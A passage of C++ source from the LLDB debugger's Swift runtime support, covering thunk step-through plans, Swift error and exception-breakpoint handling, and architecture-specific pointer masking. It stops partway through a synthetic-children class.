static ThunkKind GetThunkKind(llvm::StringRef symbol_name) {
  swift::Demangle::Node::Kind kind;
  swift::Demangle::Context demangle_ctx;
  if (!demangle_ctx.isThunkSymbol(symbol_name))
    return ThunkKind::Unknown;

  swift::Demangle::NodePointer nodes =
      demangle_ctx.demangleSymbolAsNode(symbol_name);
  size_t num_global_children = nodes->getNumChildren();
  if (num_global_children == 0)
    return ThunkKind::Unknown;

  if (nodes->getKind() != swift::Demangle::Node::Kind::Global)
    return ThunkKind::Unknown;
  if (nodes->getNumChildren() == 0)
    return ThunkKind::Unknown;

  swift::Demangle::NodePointer node_ptr =
nodes->getFirstChild(); kind = node_ptr->getKind(); switch (kind) { case swift::Demangle::Node::Kind::ObjCAttribute: return ThunkKind::ObjCAttribute; break; case swift::Demangle::Node::Kind::ProtocolWitness: if (node_ptr->getNumChildren() == 0) return ThunkKind::Unknown; if (node_ptr->getFirstChild()->getKind() == swift::Demangle::Node::Kind::ProtocolConformance) return ThunkKind::ProtocolConformance; break; case swift::Demangle::Node::Kind::ReabstractionThunkHelper: return ThunkKind::Reabstraction; case swift::Demangle::Node::Kind::PartialApplyForwarder: return ThunkKind::PartialApply; case swift::Demangle::Node::Kind::Allocator: if (node_ptr->getNumChildren() == 0) return ThunkKind::Unknown; if (node_ptr->getFirstChild()->getKind() == swift::Demangle::Node::Kind::Class) return ThunkKind::AllocatingInit; break; default: break; } return ThunkKind::Unknown; } static const char *GetThunkKindName (ThunkKind kind) { switch (kind) { case ThunkKind::Unknown: return "Unknown"; case ThunkKind::AllocatingInit: return "StepThrough"; case ThunkKind::PartialApply: return "GetThunkTarget"; case ThunkKind::ObjCAttribute: return "GetThunkTarget"; case ThunkKind::Reabstraction: return "GetThunkTarget"; case ThunkKind::ProtocolConformance: return "StepIntoConformance"; } } static ThunkAction GetThunkAction (ThunkKind kind) { switch (kind) { case ThunkKind::Unknown: return ThunkAction::Unknown; case ThunkKind::AllocatingInit: return ThunkAction::StepThrough; case ThunkKind::PartialApply: return ThunkAction::GetThunkTarget; case ThunkKind::ObjCAttribute: return ThunkAction::GetThunkTarget; case ThunkKind::Reabstraction: return ThunkAction::StepThrough; case ThunkKind::ProtocolConformance: return ThunkAction::StepIntoConformance; } } bool SwiftLanguageRuntime::GetTargetOfPartialApply(SymbolContext &curr_sc, ConstString &apply_name, SymbolContext &sc) { if (!curr_sc.module_sp) return false; SymbolContextList sc_list; swift::Demangle::Context demangle_ctx; // Make sure this is a partial 
apply: std::string apply_target = demangle_ctx.getThunkTarget(apply_name.GetStringRef()); if (!apply_target.empty()) { size_t num_symbols = curr_sc.module_sp->FindFunctions( ConstString(apply_target), NULL, eFunctionNameTypeFull, true, false, false, sc_list); if (num_symbols == 0) return false; CompileUnit *curr_cu = curr_sc.comp_unit; size_t num_found = 0; for (size_t i = 0; i < num_symbols; i++) { SymbolContext tmp_sc; if (sc_list.GetContextAtIndex(i, tmp_sc)) { if (tmp_sc.comp_unit && curr_cu && tmp_sc.comp_unit == curr_cu) { sc = tmp_sc; num_found++; } else if (curr_sc.module_sp == tmp_sc.module_sp) { sc = tmp_sc; num_found++; } } } if (num_found == 1) return true; else { sc.Clear(false); return false; } } else { return false; } } bool SwiftLanguageRuntime::IsSymbolARuntimeThunk(const Symbol &symbol) { llvm::StringRef symbol_name = symbol.GetMangled().GetMangledName().GetStringRef(); if (symbol_name.empty()) return false; swift::Demangle::Context demangle_ctx; return demangle_ctx.isThunkSymbol(symbol_name); } lldb::ThreadPlanSP SwiftLanguageRuntime::GetStepThroughTrampolinePlan(Thread &thread, bool stop_others) { // Here are the trampolines we have at present. // 1) The thunks from protocol invocations to the call in the actual object // implementing the protocol. // 2) Thunks for going from Swift ObjC classes to their actual method // invocations // 3) Thunks that retain captured objects in closure invocations. ThreadPlanSP new_thread_plan_sp; Log *log(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_STEP)); StackFrameSP stack_sp = thread.GetStackFrameAtIndex(0); if (!stack_sp) return new_thread_plan_sp; SymbolContext sc = stack_sp->GetSymbolContext(eSymbolContextEverything); Symbol *symbol = sc.symbol; // Note, I don't really need to consult IsSymbolARuntimeThunk here, but it // is fast to do and // keeps this list and the one in IsSymbolARuntimeThunk in sync. 
if (!symbol || !IsSymbolARuntimeThunk(*symbol)) return new_thread_plan_sp; // Only do this if you are at the beginning of the thunk function: lldb::addr_t cur_addr = thread.GetRegisterContext()->GetPC(); lldb::addr_t symbol_addr = symbol->GetAddress().GetLoadAddress( &thread.GetProcess()->GetTarget()); if (symbol_addr != cur_addr) return new_thread_plan_sp; Address target_address; ConstString symbol_mangled_name = symbol->GetMangled().GetMangledName(); const char *symbol_name = symbol_mangled_name.AsCString(); ThunkKind thunk_kind = GetThunkKind(symbol_mangled_name.GetStringRef()); ThunkAction thunk_action = GetThunkAction(thunk_kind); switch (thunk_action) { case ThunkAction::Unknown: return new_thread_plan_sp; case ThunkAction::GetThunkTarget: { swift::Demangle::Context demangle_ctx; std::string thunk_target = demangle_ctx.getThunkTarget(symbol_name); if (thunk_target.empty()) { if (log) log->Printf("Stepped to thunk \"%s\" (kind: %s) but could not " "find the thunk target. ", symbol_name, GetThunkKindName(thunk_kind)); return new_thread_plan_sp; } if (log) log->Printf("Stepped to thunk \"%s\" (kind: %s) stepping to target: \"%s\".", symbol_name, GetThunkKindName(thunk_kind), thunk_target.c_str()); ModuleList modules = thread.GetProcess()->GetTarget().GetImages(); SymbolContextList sc_list; modules.FindFunctionSymbols(ConstString(thunk_target), eFunctionNameTypeFull, sc_list); if (sc_list.GetSize() == 1) { SymbolContext sc; sc_list.GetContextAtIndex(0, sc); if (sc.symbol) target_address = sc.symbol->GetAddress(); } } break; case ThunkAction::StepIntoConformance: { // The TTW symbols encode the protocol conformance requirements and it // is possible to go to // the AST and get it to replay the logic that it used to determine // what to dispatch to. // But that ties us too closely to the logic of the compiler, and // these thunks are quite // simple, they just do a little retaining, and then call the correct // function. 
// So for simplicity's sake, I'm just going to get the base name of // the function // this protocol thunk is preparing to call, then step into through // the thunk, stopping if I end up // in a frame with that function name. swift::Demangle::Context demangle_ctx; swift::Demangle::NodePointer demangled_nodes = demangle_ctx.demangleSymbolAsNode(symbol_mangled_name.GetStringRef()); // Now find the ProtocolWitness node in the demangled result. swift::Demangle::NodePointer witness_node = demangled_nodes; bool found_witness_node = false; while (witness_node) { if (witness_node->getKind() == swift::Demangle::Node::Kind::ProtocolWitness) { found_witness_node = true; break; } witness_node = witness_node->getFirstChild(); } if (!found_witness_node) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the ProtocolWitness node in the demangled " "nodes.", symbol_name); return new_thread_plan_sp; } size_t num_children = witness_node->getNumChildren(); if (num_children < 2) { if (log) log->Printf("Stepped into witness thunk \"%s\" but the " "ProtocolWitness node doesn't have enough nodes.", symbol_name); return new_thread_plan_sp; } swift::Demangle::NodePointer function_node = witness_node->getChild(1); if (function_node == nullptr || function_node->getKind() != swift::Demangle::Node::Kind::Function) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the function in the ProtocolWitness node.", symbol_name); return new_thread_plan_sp; } // Okay, now find the name of this function. 
num_children = function_node->getNumChildren(); swift::Demangle::NodePointer name_node(nullptr); for (size_t i = 0; i < num_children; i++) { if (function_node->getChild(i)->getKind() == swift::Demangle::Node::Kind::Identifier) { name_node = function_node->getChild(i); break; } } if (!name_node) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the Function name in the function node.", symbol_name); return new_thread_plan_sp; } std::string function_name(name_node->getText()); if (function_name.empty()) { if (log) log->Printf("Stepped into witness thunk \"%s\" but the Function " "name was empty.", symbol_name); return new_thread_plan_sp; } // We have to get the address range of the thunk symbol, and make a // "step through range stepping in" AddressRange sym_addr_range(sc.symbol->GetAddress(), sc.symbol->GetByteSize()); new_thread_plan_sp.reset(new ThreadPlanStepInRange( thread, sym_addr_range, sc, function_name.c_str(), eOnlyDuringStepping, eLazyBoolNo, eLazyBoolNo)); return new_thread_plan_sp; } break; case ThunkAction::StepThrough: { if (log) log->Printf("Stepping through thunk: %s kind: %s", symbol_name, GetThunkKindName(thunk_kind)); AddressRange sym_addr_range(sc.symbol->GetAddress(), sc.symbol->GetByteSize()); new_thread_plan_sp.reset(new ThreadPlanStepInRange( thread, sym_addr_range, sc, nullptr, eOnlyDuringStepping, eLazyBoolNo, eLazyBoolNo)); return new_thread_plan_sp; } break; } if (target_address.IsValid()) { new_thread_plan_sp.reset( new ThreadPlanRunToAddress(thread, target_address, stop_others)); } return new_thread_plan_sp; } void SwiftLanguageRuntime::FindFunctionPointersInCall( StackFrame &frame, std::vector<Address> &addresses, bool debug_only, bool resolve_thunks) { // Extract the mangled name from the stack frame, and realize the function // type in the Target's SwiftASTContext. // Then walk the arguments looking for function pointers. 
If we find one in // the FIRST argument, we can fetch // the pointer value and return that. // FIXME: when we can ask swift/llvm for the location of function arguments, // then we can do this for all the // function pointer arguments we find. SymbolContext sc = frame.GetSymbolContext(eSymbolContextSymbol); if (sc.symbol) { Mangled mangled_name = sc.symbol->GetMangled(); if (mangled_name.GuessLanguage() == lldb::eLanguageTypeSwift) { Status error; Target &target = frame.GetThread()->GetProcess()->GetTarget(); ExecutionContext exe_ctx(frame); auto swift_ast = target.GetScratchSwiftASTContext(error, frame); if (swift_ast) { CompilerType function_type = swift_ast->GetTypeFromMangledTypename( mangled_name.GetMangledName(), error); if (error.Success()) { if (function_type.IsFunctionType()) { // FIXME: For now we only check the first argument since we don't // know how to find the values // of arguments further in the argument list. // int num_arguments = function_type.GetFunctionArgumentCount(); // for (int i = 0; i < num_arguments; i++) for (int i = 0; i < 1; i++) { CompilerType argument_type = function_type.GetFunctionArgumentTypeAtIndex(i); if (argument_type.IsFunctionPointerType()) { // We found a function pointer argument. Try to track down its // value. This is a hack // for now, we really should ask swift/llvm how to find the // argument(s) given the // Swift decl for this function, and then look those up in the // frame. ABISP abi_sp(frame.GetThread()->GetProcess()->GetABI()); ValueList argument_values; Value input_value; CompilerType clang_void_ptr_type = target.GetScratchClangASTContext() ->GetBasicType(eBasicTypeVoid) .GetPointerType(); input_value.SetValueType(Value::eValueTypeScalar); input_value.SetCompilerType(clang_void_ptr_type); argument_values.PushValue(input_value); bool success = abi_sp->GetArgumentValues( *(frame.GetThread().get()), argument_values); if (success) { // Now get a pointer value from the zeroth argument. 
// --- continuation of FindFunctionPointersInCall: we are inside the
// "if (success)" branch after the ABI produced the argument values. ---
// Read the zeroth argument back as a pointer-sized value.
Status error;
DataExtractor data;
ExecutionContext exe_ctx;
frame.CalculateExecutionContext(exe_ctx);
error = argument_values.GetValueAtIndex(0)->GetValueAsData(
    &exe_ctx, data, 0, NULL);
lldb::offset_t offset = 0;
lldb::addr_t fn_ptr_addr = data.GetPointer(&offset);
Address fn_ptr_address;
fn_ptr_address.SetLoadAddress(fn_ptr_addr, &target);
// Now check to see if this has debug info:
bool add_it = true;

if (resolve_thunks) {
  // If the pointee is a partial-apply forwarder, swap in the address of
  // the function it forwards to.
  SymbolContext sc;
  fn_ptr_address.CalculateSymbolContext(&sc, eSymbolContextEverything);
  if (sc.comp_unit && sc.symbol) {
    ConstString symbol_name = sc.symbol->GetMangled().GetMangledName();
    if (symbol_name) {
      SymbolContext target_context;
      if (GetTargetOfPartialApply(sc, symbol_name, target_context)) {
        if (target_context.symbol)
          fn_ptr_address = target_context.symbol->GetAddress();
        else if (target_context.function)
          fn_ptr_address =
              target_context.function->GetAddressRange().GetBaseAddress();
      }
    }
  }
}

if (debug_only) {
  // Only keep targets that resolve to a source line.
  LineEntry line_entry;
  fn_ptr_address.CalculateSymbolContextLineEntry(line_entry);
  if (!line_entry.IsValid())
    add_it = false;
}
if (add_it)
  addresses.push_back(fn_ptr_address);
}           // if (success)
}           // if (argument_type.IsFunctionPointerType())
}           // for (each checked argument)
}           // if (function_type.IsFunctionType())
}           // if (error.Success())
}           // if (swift_ast)
}           // if (GuessLanguage() == eLanguageTypeSwift)
}           // if (sc.symbol)
}           // FindFunctionPointersInCall

//------------------------------------------------------------------
// Exception breakpoint Precondition class for Swift:
//------------------------------------------------------------------

/// Add a type name the exception precondition should match against.
void SwiftLanguageRuntime::SwiftExceptionPrecondition::AddTypeName(
    const char *class_name) {
  m_type_names.insert(class_name);
}

/// Record that \p element_name of enum \p enum_name should be matched.
/// emplace only inserts when the enum is not yet present; either way the
/// element is appended to that enum's list.
void SwiftLanguageRuntime::SwiftExceptionPrecondition::AddEnumSpec(
    const char *enum_name, const char *element_name) {
  std::unordered_map<std::string, std::vector<std::string>>::value_type
      new_value(enum_name, std::vector<std::string>());
  auto result = m_enum_spec.emplace(new_value);
  result.first->second.push_back(element_name);
}

SwiftLanguageRuntime::SwiftExceptionPrecondition::SwiftExceptionPrecondition() {
}

/// Wrap \p value as a Swift Error ValueObject named \p name.
///
/// The value is retyped to the Swift Error existential, validated via
/// IsValidErrorValue, and — when \p persistent is set — registered as a
/// persistent expression variable (e.g. $E-style) in the target, keeping
/// the live value reachable through m_live_sp.
ValueObjectSP SwiftLanguageRuntime::CalculateErrorValueObjectFromValue(
    Value &value, ConstString name, bool
persistent) {
  ValueObjectSP error_valobj_sp;
  Status error;
  SwiftASTContext *ast_context = llvm::dyn_cast_or_null<SwiftASTContext>(
      m_process->GetTarget().GetScratchTypeSystemForLanguage(
          &error, eLanguageTypeSwift));
  if (!ast_context || error.Fail())
    return error_valobj_sp;

  CompilerType swift_error_proto_type = ast_context->GetErrorType();
  value.SetCompilerType(swift_error_proto_type);

  error_valobj_sp = ValueObjectConstResult::Create(m_process, value, name);
  if (error_valobj_sp && error_valobj_sp->GetError().Success()) {
    error_valobj_sp = error_valobj_sp->GetQualifiedRepresentationIfAvailable(
        lldb::eDynamicCanRunTarget, true);
    // Discard anything that does not look like a genuine Error value.
    if (!IsValidErrorValue(*(error_valobj_sp.get()))) {
      error_valobj_sp.reset();
    }
  }

  if (persistent && error_valobj_sp) {
    ExecutionContext ctx =
        error_valobj_sp->GetExecutionContextRef().Lock(false);
    auto *exe_scope = ctx.GetBestExecutionContextScope();
    if (!exe_scope)
      return error_valobj_sp;
    Target &target = m_process->GetTarget();
    auto *persistent_state =
        target.GetSwiftPersistentExpressionState(*exe_scope);

    const bool is_error = true;
    auto prefix = persistent_state->GetPersistentVariablePrefix(is_error);
    ConstString persistent_variable_name(
        persistent_state->GetNextPersistentVariableName(target, prefix));

    lldb::ValueObjectSP const_valobj_sp;

    // Check in case our value is already a constant value
    if (error_valobj_sp->GetIsConstant()) {
      const_valobj_sp = error_valobj_sp;
      const_valobj_sp->SetName(persistent_variable_name);
    } else
      const_valobj_sp =
          error_valobj_sp->CreateConstantValue(persistent_variable_name);

    lldb::ValueObjectSP live_valobj_sp = error_valobj_sp;

    error_valobj_sp = const_valobj_sp;

    ExpressionVariableSP clang_expr_variable_sp(
        persistent_state->CreatePersistentVariable(error_valobj_sp));
    clang_expr_variable_sp->m_live_sp = live_valobj_sp;
    clang_expr_variable_sp->m_flags |=
        ClangExpressionVariable::EVIsProgramReference;

    error_valobj_sp = clang_expr_variable_sp->GetValueObject();
  }
  return error_valobj_sp;
}

ValueObjectSP
SwiftLanguageRuntime::CalculateErrorValue(StackFrameSP frame_sp, ConstString variable_name) { ProcessSP process_sp(frame_sp->GetThread()->GetProcess()); Status error; Target *target = frame_sp->CalculateTarget().get(); ValueObjectSP error_valobj_sp; auto *runtime = Get(*process_sp); if (!runtime) return error_valobj_sp; llvm::Optional<Value> arg0 = runtime->GetErrorReturnLocationAfterReturn(frame_sp); if (!arg0) return error_valobj_sp; ExecutionContext exe_ctx; frame_sp->CalculateExecutionContext(exe_ctx); auto *exe_scope = exe_ctx.GetBestExecutionContextScope(); if (!exe_scope) return error_valobj_sp; auto ast_context = target->GetScratchSwiftASTContext(error, *frame_sp); if (!ast_context || error.Fail()) return error_valobj_sp; lldb::DataBufferSP buffer(new lldb_private::DataBufferHeap( arg0->GetScalar().GetBytes(), arg0->GetScalar().GetByteSize())); CompilerType swift_error_proto_type = ast_context->GetErrorType(); if (!swift_error_proto_type.IsValid()) return error_valobj_sp; error_valobj_sp = ValueObjectConstResult::Create( exe_scope, swift_error_proto_type, variable_name, buffer, endian::InlHostByteOrder(), exe_ctx.GetAddressByteSize()); if (error_valobj_sp->GetError().Fail()) return error_valobj_sp; error_valobj_sp = error_valobj_sp->GetQualifiedRepresentationIfAvailable( lldb::eDynamicCanRunTarget, true); return error_valobj_sp; } void SwiftLanguageRuntime::RegisterGlobalError(Target &target, ConstString name, lldb::addr_t addr) { Status ast_context_error; SwiftASTContext *ast_context = llvm::dyn_cast_or_null<SwiftASTContext>( target.GetScratchTypeSystemForLanguage(&ast_context_error, eLanguageTypeSwift)); if (ast_context_error.Success() && ast_context && !ast_context->HasFatalErrors()) { SwiftPersistentExpressionState *persistent_state = llvm::cast<SwiftPersistentExpressionState>( target.GetPersistentExpressionStateForLanguage( lldb::eLanguageTypeSwift)); std::string module_name = "$__lldb_module_for_"; module_name.append(&name.GetCString()[1]); 
SourceModule module_info; module_info.path.push_back(ConstString(module_name)); Status module_creation_error; swift::ModuleDecl *module_decl = ast_context->CreateModule(module_info, module_creation_error); if (module_creation_error.Success() && module_decl) { const bool is_static = false; const auto introducer = swift::VarDecl::Introducer::Let; const bool is_capture_list = false; swift::VarDecl *var_decl = new (*ast_context->GetASTContext()) swift::VarDecl(is_static, introducer, is_capture_list, swift::SourceLoc(), ast_context->GetIdentifier(name.GetCString()), module_decl); var_decl->setType(GetSwiftType(ast_context->GetErrorType())); var_decl->setInterfaceType(var_decl->getType()); var_decl->setDebuggerVar(true); persistent_state->RegisterSwiftPersistentDecl(var_decl); ConstString mangled_name; { swift::Mangle::ASTMangler mangler(true); mangled_name = ConstString(mangler.mangleGlobalVariableFull(var_decl)); } lldb::addr_t symbol_addr; { ProcessSP process_sp(target.GetProcessSP()); Status alloc_error; symbol_addr = process_sp->AllocateMemory( process_sp->GetAddressByteSize(), lldb::ePermissionsWritable | lldb::ePermissionsReadable, alloc_error); if (alloc_error.Success() && symbol_addr != LLDB_INVALID_ADDRESS) { Status write_error; process_sp->WritePointerToMemory(symbol_addr, addr, write_error); if (write_error.Success()) { persistent_state->RegisterSymbol(mangled_name, symbol_addr); } } } } } } lldb::BreakpointPreconditionSP SwiftLanguageRuntime::GetBreakpointExceptionPrecondition(LanguageType language, bool throw_bp) { if (language != eLanguageTypeSwift) return lldb::BreakpointPreconditionSP(); if (!throw_bp) return lldb::BreakpointPreconditionSP(); BreakpointPreconditionSP precondition_sp( new SwiftLanguageRuntime::SwiftExceptionPrecondition()); return precondition_sp; } bool SwiftLanguageRuntime::SwiftExceptionPrecondition::EvaluatePrecondition( StoppointCallbackContext &context) { if (!m_type_names.empty()) { StackFrameSP frame_sp = 
context.exe_ctx_ref.GetFrameSP(); if (!frame_sp) return true; ValueObjectSP error_valobj_sp = CalculateErrorValue(frame_sp, ConstString("__swift_error_var")); if (!error_valobj_sp || error_valobj_sp->GetError().Fail()) return true; // This shouldn't fail, since at worst it will return me the object I just // successfully got. std::string full_error_name( error_valobj_sp->GetCompilerType().GetTypeName().AsCString()); size_t last_dot_pos = full_error_name.rfind('.'); std::string type_name_base; if (last_dot_pos == std::string::npos) type_name_base = full_error_name; else { if (last_dot_pos + 1 <= full_error_name.size()) type_name_base = full_error_name.substr(last_dot_pos + 1, full_error_name.size()); } // The type name will be the module and then the type. If the match name // has a dot, we require a complete // match against the type, if the type name has no dot, we match it against // the base. for (std::string name : m_type_names) { if (name.rfind('.') != std::string::npos) { if (name == full_error_name) return true; } else { if (name == type_name_base) return true; } } return false; } return true; } void SwiftLanguageRuntime::SwiftExceptionPrecondition::GetDescription( Stream &stream, lldb::DescriptionLevel level) { if (level == eDescriptionLevelFull || level == eDescriptionLevelVerbose) { if (m_type_names.size() > 0) { stream.Printf("\nType Filters:"); for (std::string name : m_type_names) { stream.Printf(" %s", name.c_str()); } stream.Printf("\n"); } } } Status SwiftLanguageRuntime::SwiftExceptionPrecondition::ConfigurePrecondition( Args &args) { Status error; std::vector<std::string> object_typenames; args.GetOptionValuesAsStrings("exception-typename", object_typenames); for (auto type_name : object_typenames) AddTypeName(type_name.c_str()); return error; } void SwiftLanguageRuntime::AddToLibraryNegativeCache(StringRef library_name) { std::lock_guard<std::mutex> locker(m_negative_cache_mutex); m_library_negative_cache.insert(library_name); } bool 
// (return type `bool` appears at the end of the preceding source line)
// True iff \p library_name was previously recorded as known-absent.
SwiftLanguageRuntime::IsInLibraryNegativeCache(StringRef library_name) {
  std::lock_guard<std::mutex> locker(m_negative_cache_mutex);
  return m_library_negative_cache.count(library_name) == 1;
}

/// Strip the architecture-specific Swift spare/tag bits from a
/// possibly-bridged pointer.
///
/// \param addr         the raw pointer value.
/// \param masked_bits  optional out-param receiving the bits that were
///                     removed (addr & mask).
/// \return addr with the spare bits cleared; addr unchanged on unknown
///         cores or pointer sizes.
lldb::addr_t
SwiftLanguageRuntime::MaskMaybeBridgedPointer(lldb::addr_t addr,
                                              lldb::addr_t *masked_bits) {
  if (!m_process)
    return addr;
  const ArchSpec &arch_spec(m_process->GetTarget().GetArchitecture());
  ArchSpec::Core core_kind = arch_spec.GetCore();
  bool is_arm = false;
  bool is_intel = false;
  bool is_s390x = false;
  bool is_32 = false;
  bool is_64 = false;
  // Classify the core first; arm64 is both "arm" and 64-bit up front.
  if (core_kind == ArchSpec::Core::eCore_arm_arm64) {
    is_arm = is_64 = true;
  } else if (core_kind >= ArchSpec::Core::kCore_arm_first &&
             core_kind <= ArchSpec::Core::kCore_arm_last) {
    is_arm = true;
  } else if (core_kind >= ArchSpec::Core::kCore_x86_64_first &&
             core_kind <= ArchSpec::Core::kCore_x86_64_last) {
    is_intel = true;
  } else if (core_kind >= ArchSpec::Core::kCore_x86_32_first &&
             core_kind <= ArchSpec::Core::kCore_x86_32_last) {
    is_intel = true;
  } else if (core_kind == ArchSpec::Core::eCore_s390x_generic) {
    is_s390x = true;
  } else {
    // this is a really random CPU core to be running on - just get out fast
    return addr;
  }

  switch (arch_spec.GetAddressByteSize()) {
  case 4:
    is_32 = true;
    break;
  case 8:
    is_64 = true;
    break;
  default:
    // this is a really random pointer size to be running on - just get out
    // fast
    return addr;
  }

  // Pick the ABI-defined spare-bits mask for the (arch, width) pair.
  lldb::addr_t mask = 0;

  if (is_arm && is_64)
    mask = SWIFT_ABI_ARM64_SWIFT_SPARE_BITS_MASK;

  if (is_arm && is_32)
    mask = SWIFT_ABI_ARM_SWIFT_SPARE_BITS_MASK;

  if (is_intel && is_64)
    mask = SWIFT_ABI_X86_64_SWIFT_SPARE_BITS_MASK;

  if (is_intel && is_32)
    mask = SWIFT_ABI_I386_SWIFT_SPARE_BITS_MASK;

  if (is_s390x && is_64)
    mask = SWIFT_ABI_S390X_SWIFT_SPARE_BITS_MASK;

  if (masked_bits)
    *masked_bits = addr & mask;
  return addr & ~mask;
}

/// Unwrap a non-trivially-managed (e.g. weak) reference pointer to the
/// actual object pointer, honoring ObjC tagged pointers and the
/// per-architecture weak-reference marker bits.
/// (Body continues on the following source lines.)
lldb::addr_t SwiftLanguageRuntime::MaybeMaskNonTrivialReferencePointer(
    lldb::addr_t addr,
    SwiftASTContext::NonTriviallyManagedReferenceStrategy strategy) {
  // Null references need no unwrapping.
  if (addr == 0)
    return addr;
AppleObjCRuntime *objc_runtime = GetObjCRuntime(); if (objc_runtime) { // tagged pointers don't perform any masking if (objc_runtime->IsTaggedPointer(addr)) return addr; } if (!m_process) return addr; const ArchSpec &arch_spec(m_process->GetTarget().GetArchitecture()); ArchSpec::Core core_kind = arch_spec.GetCore(); bool is_arm = false; bool is_intel = false; bool is_32 = false; bool is_64 = false; if (core_kind == ArchSpec::Core::eCore_arm_arm64) { is_arm = is_64 = true; } else if (core_kind >= ArchSpec::Core::kCore_arm_first && core_kind <= ArchSpec::Core::kCore_arm_last) { is_arm = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_64_first && core_kind <= ArchSpec::Core::kCore_x86_64_last) { is_intel = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_32_first && core_kind <= ArchSpec::Core::kCore_x86_32_last) { is_intel = true; } else { // this is a really random CPU core to be running on - just get out fast return addr; } switch (arch_spec.GetAddressByteSize()) { case 4: is_32 = true; break; case 8: is_64 = true; break; default: // this is a really random pointer size to be running on - just get out fast return addr; } lldb::addr_t mask = 0; if (strategy == SwiftASTContext::NonTriviallyManagedReferenceStrategy::eWeak) { bool is_indirect = true; // On non-objc platforms, the weak reference pointer always pointed to a // runtime structure. // For ObjC platforms, the masked value determines whether it is indirect. 
uint32_t value = 0; if (objc_runtime) { if (is_intel) { if (is_64) { mask = SWIFT_ABI_X86_64_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_X86_64_OBJC_WEAK_REFERENCE_MARKER_VALUE; } else { mask = SWIFT_ABI_I386_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_I386_OBJC_WEAK_REFERENCE_MARKER_VALUE; } } else if (is_arm) { if (is_64) { mask = SWIFT_ABI_ARM64_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_ARM64_OBJC_WEAK_REFERENCE_MARKER_VALUE; } else { mask = SWIFT_ABI_ARM_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_ARM_OBJC_WEAK_REFERENCE_MARKER_VALUE; } } } else { // This name is a little confusing. The "DEFAULT" marking in System.h // is supposed to mean: the value for non-ObjC platforms. So // DEFAULT_OBJC here actually means "non-ObjC". mask = SWIFT_ABI_DEFAULT_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_DEFAULT_OBJC_WEAK_REFERENCE_MARKER_VALUE; } is_indirect = ((addr & mask) == value); if (!is_indirect) return addr; // The masked value of address is a pointer to the runtime structure. // The first field of the structure is the actual pointer. Process *process = GetProcess(); Status error; lldb::addr_t masked_addr = addr & ~mask; lldb::addr_t isa_addr = process->ReadPointerFromMemory(masked_addr, error); if (error.Fail()) { // FIXME: do some logging here. 
return addr; } return isa_addr; } else { if (is_arm && is_64) mask = SWIFT_ABI_ARM64_OBJC_NUM_RESERVED_LOW_BITS; else if (is_intel && is_64) mask = SWIFT_ABI_X86_64_OBJC_NUM_RESERVED_LOW_BITS; else mask = SWIFT_ABI_DEFAULT_OBJC_NUM_RESERVED_LOW_BITS; mask = (1 << mask) | (1 << (mask + 1)); return addr & ~mask; } return addr; } ConstString SwiftLanguageRuntime::GetErrorBackstopName() { return ConstString("swift_errorInMain"); } ConstString SwiftLanguageRuntime::GetStandardLibraryBaseName() { static ConstString g_swiftCore("swiftCore"); return g_swiftCore; } ConstString SwiftLanguageRuntime::GetStandardLibraryName() { PlatformSP platform_sp(m_process->GetTarget().GetPlatform()); if (platform_sp) return platform_sp->GetFullNameForDylib(GetStandardLibraryBaseName()); return GetStandardLibraryBaseName(); } class ProjectionSyntheticChildren : public SyntheticChildren { public: struct FieldProjection { ConstString name; CompilerType type; int32_t byte_offset; FieldProjection(CompilerType parent_type, ExecutionContext *exe_ctx, size_t idx) { const bool transparent_pointers = false; const bool omit_empty_base_classes = true; const bool ignore_array_bounds = false; bool child_is_base_class = false; bool child_is_deref_of_parent = false; std::string child_name; uint32_t child_byte_size; uint32_t child_bitfield_bit_size; uint32_t child_bitfield_bit_offset; uint64_t language_flags; type = parent_type.GetChildCompilerTypeAtIndex( exe_ctx, idx, transparent_pointers, omit_empty_base_classes, ignore_array_bounds, child_name, child_byte_size, byte_offset, child_bitfield_bit_size, child_bitfield_bit_offset, child_is_base_class, child_is_deref_of_parent, nullptr, language_flags); if (child_is_base_class) type.Clear(); // invalidate - base classes are dealt with outside of the // projection else name.SetCStringWithLength(child_name.c_str(), child_name.size()); } bool IsValid() { return !name.IsEmpty() && type.IsValid(); } explicit operator bool() { return IsValid(); } }; struct 
TypeProjection { std::vector<FieldProjection> field_projections; ConstString type_name; }; typedef std::unique_ptr<TypeProjection> TypeProjectionUP; bool IsScripted() { return false; } std::string GetDescription() { return "projection synthetic children"; } ProjectionSyntheticChildren(const Flags &flags, TypeProjectionUP &&projection) : SyntheticChildren(flags), m_projection(std::move(projection)) {} protected: TypeProjectionUP m_projection; class ProjectionFrontEndProvider : public SyntheticChildrenFrontEnd { public: ProjectionFrontEndProvider(ValueObject &backend, TypeProjectionUP &projection) : SyntheticChildrenFrontEnd(backend), m_num_bases(0), m_projection(projection.get()) { lldbassert(m_projection && "need a valid projection"); CompilerType type(backend.GetCompilerType()); m_num_bases = type.GetNumDirectBaseClasses(); } size_t CalculateNumChildren() override { return m_projection->field_projections.size() + m_num_bases; } lldb::ValueObjectSP GetChildAtIndex(size_t idx) override { if (idx < m_num_bases) { if (ValueObjectSP base_object_sp = m_backend.GetChildAtIndex(idx, true)) { CompilerType base_type(base_object_sp->GetCompilerType()); ConstString base_type_name(base_type.GetTypeName()); if (base_type_name.IsEmpty() || !SwiftLanguageRuntime::IsSwiftClassName( base_type_name.GetCString())) return base_object_sp; base_object_sp = m_backend.GetSyntheticBase( 0, base_type, true, Mangled(base_type_name, true) .GetDemangledName(lldb::eLanguageTypeSwift)); return base_object_sp; } else return nullptr; } idx -= m_num_bases; if (idx < m_projection->field_projections.size()) { auto &projection(m_projection->field_projections.at(idx)); return m_backend.GetSyntheticChildAtOffset( projection.byte_offset, projection.type, true, projection.name); } return nullptr; } size_t GetIndexOfChildWithName(ConstString name) override { for (size_t idx = 0; idx < m_projection->field_projections.size(); idx++) { if (m_projection->field_projections.at(idx).name == name) return idx; } 
